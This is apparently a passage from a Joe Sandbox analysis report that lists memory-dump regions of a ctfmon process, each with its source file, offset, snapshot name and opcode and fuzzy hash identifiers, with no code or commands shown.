                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d1323b155d438f900c06c75d2f073cd46b39e502d4e267a6f48e73cae1c3c934
                                                            • Instruction ID: 9342ff7c5743816385795b7b0566ac32f60e4bcc76655490e9786c5cf6351728
                                                            • Opcode Fuzzy Hash: d1323b155d438f900c06c75d2f073cd46b39e502d4e267a6f48e73cae1c3c934
                                                            • Instruction Fuzzy Hash: DF320131B0D78E4FE775ABA488616B877D1EF82310F0600B9D48D871E7DE6DAD0A8791
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f5e46c62615fa5093231d5a0f22b021b7b3f28edf5c53feee14775667eb3b1e
                                                            • Instruction ID: f618b3814946279818a86fe795083a7fd08f7373aaea219da13ffb44d4a4c633
                                                            • Opcode Fuzzy Hash: 1f5e46c62615fa5093231d5a0f22b021b7b3f28edf5c53feee14775667eb3b1e
                                                            • Instruction Fuzzy Hash: CCE11422B0991A4FE714FBACE8A5AECB7A0EF88365F10017BD18DD7197CE2568458790
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d59b07755ddf8e30596c6c04e11e677c6929f444de12d7399172af2fe121eb5f
                                                            • Instruction ID: bf998ea12464304c55cc9a9b42ead72b8cda5541d4dd92fd58da4548a35e8134
                                                            • Opcode Fuzzy Hash: d59b07755ddf8e30596c6c04e11e677c6929f444de12d7399172af2fe121eb5f
                                                            • Instruction Fuzzy Hash: EBD11622F0892A4FE714FBACE865AECB7A0FF85361F00017BD19DD7197CE2568458791
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6d36d18c8889d48e05fe5d9cce39a2fcd26f391e263b7e61583dd985db1a7144
                                                            • Instruction ID: fbb584cb19d0202c016049d486cc1d0782ef07e20c934a2ad1a5d4ae4d783354
                                                            • Opcode Fuzzy Hash: 6d36d18c8889d48e05fe5d9cce39a2fcd26f391e263b7e61583dd985db1a7144
                                                            • Instruction Fuzzy Hash: 5BE1D361F1EA1E4FE7B8EB9884A56B936F1FF95300F52443DD08DC31B6DDA86A018780
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 163fa66ca650e4086be32e2cb864685bcfa5ce570bf21613d4009d72c23d7ecc
                                                            • Instruction ID: 124d5be12a5f4e0d70de00665a7f625dc02ea608f87ed09f961e37eecd9bca5d
                                                            • Opcode Fuzzy Hash: 163fa66ca650e4086be32e2cb864685bcfa5ce570bf21613d4009d72c23d7ecc
                                                            • Instruction Fuzzy Hash: 96B1D122F0991D4FEB54FBA8E865BEDBBA0FF89351F0001BAD14DD3196CE2468458B91
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 917bb8d68b68d54a9c3e0c04088973faa44b99c1630becca520969fbbf7012c5
                                                            • Instruction ID: f76fa09a2158ec56ef6b4311979384ea3890f9acf6ac112eaf98c5bdb293da49
                                                            • Opcode Fuzzy Hash: 917bb8d68b68d54a9c3e0c04088973faa44b99c1630becca520969fbbf7012c5
                                                            • Instruction Fuzzy Hash: ACB11531B0DB4E4FE768EBA888646B67792EF96314F1100B9D04EC72D7CE29AC46C751
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e1df2d4614b66c23406e79aed2c6f5b2877fb6887e45cfcb15fe652be242211
                                                            • Instruction ID: 4be968a8f5fde1e9dc3847c41571e657e57f8964eb38b92f06aa33c4e8d02de4
                                                            • Opcode Fuzzy Hash: 6e1df2d4614b66c23406e79aed2c6f5b2877fb6887e45cfcb15fe652be242211
                                                            • Instruction Fuzzy Hash: 5081D831B0990D4FDBA8EB6884657FDB7E2EF99710F4501B9E04ED32D2CE646C418741
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 645ad4cbb47deed9bd7fc960a429c1b0662e63f086520f3b9fa2c40abbe34d00
                                                            • Instruction ID: 49259bedf1b1c5a5550e8cabd180e23939a027597f6bc349d42c92080c49219d
                                                            • Opcode Fuzzy Hash: 645ad4cbb47deed9bd7fc960a429c1b0662e63f086520f3b9fa2c40abbe34d00
                                                            • Instruction Fuzzy Hash: 49812D70E0861D8FDB94EFA8C8A5AADBBF1FF59304F5004B9D04DE7295DA789941CB40
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e020c32a90256dc96a3b157ae03e07e480a9af407e846094e582c7eea0c45434
                                                            • Instruction ID: 8d1e7e9051333ff24067b124840d11b3c6fdc69c6d0dac043cde6dac277f1f43
                                                            • Opcode Fuzzy Hash: e020c32a90256dc96a3b157ae03e07e480a9af407e846094e582c7eea0c45434
                                                            • Instruction Fuzzy Hash: B341282170994D0FD798FB6884A5EB577E2EF99300F0601B6E44EC32EBCD29AD46C341
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f865e1e8f5c69b02602698b0f9a00554f7d732bc2898c1ccb8deac2f061c5ad
                                                            • Instruction ID: 924c0d00f3affaccbf31f2129b667437a84c1796def2586d7beede9303f706a4
                                                            • Opcode Fuzzy Hash: 7f865e1e8f5c69b02602698b0f9a00554f7d732bc2898c1ccb8deac2f061c5ad
                                                            • Instruction Fuzzy Hash: 06312D21B0DB880FE758A76C98167B97BD1EF99714F0001BEF48EC31C7CD6868018796
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 606583cbaedbf2175aa52426028a63fac0dc711ea7a5698f154c9688cf4e96a3
                                                            • Instruction ID: cb74cc50195a9c81ab026ec381d0a5be97f8be6abaf670509a0db8d7f8132982
                                                            • Opcode Fuzzy Hash: 606583cbaedbf2175aa52426028a63fac0dc711ea7a5698f154c9688cf4e96a3
                                                            • Instruction Fuzzy Hash: 96312221B0EA8D4FDB45EBA848756B87BF1EF99200F1A01FBD449D7297CE289D058352
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22797bc3d904b5adecd607217d7a66af7a711a0785e54dad4dc16f934a58278c
                                                            • Instruction ID: a2d615120514942e33558cc6b13275139ffcdb1efcc60a2889b6a8923d69c7cc
                                                            • Opcode Fuzzy Hash: 22797bc3d904b5adecd607217d7a66af7a711a0785e54dad4dc16f934a58278c
                                                            • Instruction Fuzzy Hash: EA31C131A0991E8FEB64EBB4C4646E9BBF0FF19300F0541B6D449E31A2DE78A984CB50
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5280d8232964b5e232c666907d94cf6d06197f4af150605e69fe9e3c84f34ff2
                                                            • Instruction ID: 5d49db0541321d2dc2074a5da9b48121ba6e3928f7560590f08114fd0c6af284
                                                            • Opcode Fuzzy Hash: 5280d8232964b5e232c666907d94cf6d06197f4af150605e69fe9e3c84f34ff2
                                                            • Instruction Fuzzy Hash: AE213731F1880E4BEB58FFAC98656FD73E2EB98310F1501BBE41DD3285CD69A9014791
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aa0bd8c5cd260d3807a8bee3fdad4d15adf4e78f57f3cad1f9aefd4b64030efc
                                                            • Instruction ID: c2d95afbb515eeff7f5adcd1502db31b7535c8c72e6d9ca2f831599549216acb
                                                            • Opcode Fuzzy Hash: aa0bd8c5cd260d3807a8bee3fdad4d15adf4e78f57f3cad1f9aefd4b64030efc
                                                            • Instruction Fuzzy Hash: 1A11C312F0ED4F0BE7B4A7A914756B63681DFA6A11F0601BBD48DC21A6DD88AD064384
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f437c30c551319bf3243b4b47e53a9a16046f1374a646250877ac66c66fe0be
                                                            • Instruction ID: a8371df09efd904226f3b6ffd4eec2af7edfc16def4171cad9893d9ce659e9cb
                                                            • Opcode Fuzzy Hash: 9f437c30c551319bf3243b4b47e53a9a16046f1374a646250877ac66c66fe0be
                                                            • Instruction Fuzzy Hash: 4C11593160DB8C0FD7A5E72884741A97BE0EF9A360F01057FE08DC32A2DD69AA468341
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ef25affa98ae7accdba232a237fea2d24749744c919bd0bb68ccd7e3385456cf
                                                            • Instruction ID: f3e9101e6d4ce4a375aeff992ca0ccc7bb52cd78d2915282595f5c071f61aac9
                                                            • Opcode Fuzzy Hash: ef25affa98ae7accdba232a237fea2d24749744c919bd0bb68ccd7e3385456cf
                                                            • Instruction Fuzzy Hash: 87014C02F0ED0F0BE6F4679C14656B625C5DFE6B10F42017AE44DC219ACC88AD064384
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ed5f885e95298f5d9c6aa6923bc0f29b231aef7bc0cf3ecdf0585acae6d6087b
                                                            • Instruction ID: 79470813e4b88e88964ee21daf394fdedd8afa3c2fee009c77c004c11d75b741
                                                            • Opcode Fuzzy Hash: ed5f885e95298f5d9c6aa6923bc0f29b231aef7bc0cf3ecdf0585acae6d6087b
                                                            • Instruction Fuzzy Hash: 97012B20B0E6C80FD357E37898A96B47FD1AF87215F1941FAE08CCB0B3C9984946C342
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 660f777f825f8adaf4b9b24db86333b171eff6593ece3765702bf760ed15d46c
                                                            • Instruction ID: c4d36b3430d7012ecf55f0a80e5f4789bda44f806b0e746f62a5a2e0171a4d75
                                                            • Opcode Fuzzy Hash: 660f777f825f8adaf4b9b24db86333b171eff6593ece3765702bf760ed15d46c
                                                            • Instruction Fuzzy Hash: EEF0F412F0A80E0BEBA4AB6C14AA2FD77E2FF99211F61007ED48DD31B6DC086D064341
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 73aeb45ee263cdc24f6d4e8b17c53a4bb2dc92f32560347dbd7691a31022dc43
                                                            • Instruction ID: e9790dad0522381722ddd58e7e7374c50de421cbf397e7298f73429171b1286e
                                                            • Opcode Fuzzy Hash: 73aeb45ee263cdc24f6d4e8b17c53a4bb2dc92f32560347dbd7691a31022dc43
                                                            • Instruction Fuzzy Hash: D1014920B0E1860AE72923B844303F82B61AF87358F4601FAD4ADCE1F7CD9E29968351
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc4fc61791e4d8bb600b19de62df998d7452cb7e29aed47bae88ccd6b016ce11
                                                            • Instruction ID: ee838bd0250136399b8315494726cf6f2c0da116c119ae169fe2527b809889c8
                                                            • Opcode Fuzzy Hash: fc4fc61791e4d8bb600b19de62df998d7452cb7e29aed47bae88ccd6b016ce11
                                                            • Instruction Fuzzy Hash: 2BF0A431F0540E8BEB64FB9C98A51FD73F2EB98310F150476D44DF3295CD24AA028B90
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bee9a6aa60600c72b8e539b73c5740d81ca11cae69a914f4a7497ff8eb0198c7
                                                            • Instruction ID: c365cad02f550ee4e362777b451b1a16a26792e331dc5bbad711c4a6e9d7f944
                                                            • Opcode Fuzzy Hash: bee9a6aa60600c72b8e539b73c5740d81ca11cae69a914f4a7497ff8eb0198c7
                                                            • Instruction Fuzzy Hash: 08E02B7290E64C1EEB18AA59FC17CF67B98DA97334B00005FF59DC1163E1526563C255
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 66749df09586078a303e620bccc3860f36a6f2b491b5d8368f386fe141fa25b7
                                                            • Instruction ID: 91de4fbf94405117a901500e50c3fc616c1c5141a2e754af19e1b502075f7485
                                                            • Opcode Fuzzy Hash: 66749df09586078a303e620bccc3860f36a6f2b491b5d8368f386fe141fa25b7
                                                            • Instruction Fuzzy Hash: 6EE0DF3195EE0C5BDB24AB5ABC2068876E1FB8E308F0102AAE48CC3191D7665B59C301
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 155200945b34eecb651837d6dd8872c6cd1857fd7b77ecf08a23bd63dc72d5ab
                                                            • Instruction ID: ce9dc38581de74bf5c7f79be2064ac7c464847e09d40ad761d1d84056cd8c88b
                                                            • Opcode Fuzzy Hash: 155200945b34eecb651837d6dd8872c6cd1857fd7b77ecf08a23bd63dc72d5ab
                                                            • Instruction Fuzzy Hash: C4E0C03280EA0C8BDB44AB985C202E833B0FF4A308F01006DE08CC31A0DB715A44C340
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f8461882dcbebaddd66321bd6c5a1d6995b1e8e9028f3facc686d7e21e2f6852
                                                            • Instruction ID: 2579d049506098d598b3e681f35583c66f08216ce14f598d97b8c66c376865c5
                                                            • Opcode Fuzzy Hash: f8461882dcbebaddd66321bd6c5a1d6995b1e8e9028f3facc686d7e21e2f6852
                                                            • Instruction Fuzzy Hash: 48D0028194F3C94FD70352B61C791947F706E1701178E41EBC9C5DB2A7E49E49898323
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0eef4ac1751eeed90cfd1730c59f50bff1dfd871d737e56bb89dde4e1ff689fa
                                                            • Instruction ID: 77eb57825d8557362d696eacd50ebbdcf49590f7d6a6d6e2adf0ab05fc602a8c
                                                            • Opcode Fuzzy Hash: 0eef4ac1751eeed90cfd1730c59f50bff1dfd871d737e56bb89dde4e1ff689fa
                                                            • Instruction Fuzzy Hash: 31C02B13B8AD0F098B047358B880CE1F380C7501303400AB3C80BC104CDC1B98C14340
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 19f89e6de9cc2154b40f33fa73ca2363ff0fdb95d0bca70f8bfc228a0f13f803
                                                            • Instruction ID: e4c25f69a7d0ebea2107cb8d28b561f3cb5489c3182496ff0f92da3e262d6a04
                                                            • Opcode Fuzzy Hash: 19f89e6de9cc2154b40f33fa73ca2363ff0fdb95d0bca70f8bfc228a0f13f803
                                                            • Instruction Fuzzy Hash: 79C1AB20B2E69E1FE369AB7884612B53BD1EF96314F0640BED48EC71E7DD1DAD428341
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3de871229e17669c30f2796c0c05dc3f9e6032f6482812b5dd5e623e8a953440
                                                            • Instruction ID: 05cbe7b958015dea658e11e6303ff2d23c2384a03ca1e9b588f3489e652d9a80
                                                            • Opcode Fuzzy Hash: 3de871229e17669c30f2796c0c05dc3f9e6032f6482812b5dd5e623e8a953440
                                                            • Instruction Fuzzy Hash: A6324631F2D68E5FE775ABA488216B837D1EF82310F0600B9D44D871E7DE1DAE4A8791
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 65613ef61bba5f46096e01a339ef898bf0663c95aacbf2b6efc4e60cedec4d9d
                                                            • Instruction ID: 56c38f24a907a8edf3d7558b8a9bea0060c29d8cde10f6f87e23ec36f8f847f2
                                                            • Opcode Fuzzy Hash: 65613ef61bba5f46096e01a339ef898bf0663c95aacbf2b6efc4e60cedec4d9d
                                                            • Instruction Fuzzy Hash: ABE19161B2A91EAEE7B8DB9884A57BD37E1EF94300B56447DD00DC33E2DD286B418381
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ebb399da70dcf5d2fadfb2928629f41929ea3936679cca86a203161b77de577e
                                                            • Instruction ID: 35c2e78ae7559fa0c7f4b2dcf909eba490d96e20d06c2fdb30dc30a881284827
                                                            • Opcode Fuzzy Hash: ebb399da70dcf5d2fadfb2928629f41929ea3936679cca86a203161b77de577e
                                                            • Instruction Fuzzy Hash: 18C1F232F1C51A5EEB55FBACE8A5AEDBBA0EF84320F00017BE04DD7197DE2469458B50
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0a87cee9616bf4a3e53007021c4f19df715276a34a729169206fb7ed477af7a7
                                                            • Instruction ID: 5519b499ad604571e10d00a2e9ff7db348acb358ef810a59a8465a08529a1847
                                                            • Opcode Fuzzy Hash: 0a87cee9616bf4a3e53007021c4f19df715276a34a729169206fb7ed477af7a7
                                                            • Instruction Fuzzy Hash: 0BB1D032F1D51D5EEB54FBA8E865AEDBBA0FF84320F0001BBE04DD7296DE2469458B50
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e6d525240634d86becb74567669e91c49361cf4c1ecc9002a2a90cdd166e852b
                                                            • Instruction ID: 81d9647bedd6cb8fef2202ccdfb498379ff69ca95706b32a5a4ca58414ee6a4f
                                                            • Opcode Fuzzy Hash: e6d525240634d86becb74567669e91c49361cf4c1ecc9002a2a90cdd166e852b
                                                            • Instruction Fuzzy Hash: A8B12631B1DA4E5FE768EBA8C8606B67392EF85314F1500B9D00EC72D7CE29AD46C750
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 501ebfb32d53b77bfa73271681b4c68c859437956659b5b69505c554cfa63f55
                                                            • Instruction ID: 29387fc2f05059430858109f537c2553001b034b925b35d5a6d4fcb0298afbf0
                                                            • Opcode Fuzzy Hash: 501ebfb32d53b77bfa73271681b4c68c859437956659b5b69505c554cfa63f55
                                                            • Instruction Fuzzy Hash: CB61A431B1891D5FDBA8EBA884666BCB3E2EF9C710F414179E00ED32D6CE286D428740
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e2133ef2ef3f117cbe8fa647777d5e898583021c1c2fd9aa4939f636aebf9197
                                                            • Instruction ID: 70aff4c9393b5e8c521b32af49a2a2662f4537b0b9f6023b4cc69759c7ed6678
                                                            • Opcode Fuzzy Hash: e2133ef2ef3f117cbe8fa647777d5e898583021c1c2fd9aa4939f636aebf9197
                                                            • Instruction Fuzzy Hash: BA811D70E1961D9FDF55EFA8C4A5AAC77B1FF58304F1004B9D00DE7296DA34A981CB40
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 47cb714a62fe5b86caea7459d17273582272b5b6e447cb02e03fa532787ef337
                                                            • Instruction ID: e601a8220676cf83dfaddc3af7bcabe51748184f0db32d02135490d739c26393
                                                            • Opcode Fuzzy Hash: 47cb714a62fe5b86caea7459d17273582272b5b6e447cb02e03fa532787ef337
                                                            • Instruction Fuzzy Hash: B8415B20B199491FDB99FB7884A6EB573D2EF98300B0601B6E40EC32E7CD29AD06C301
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1906039513.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9b9e0000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
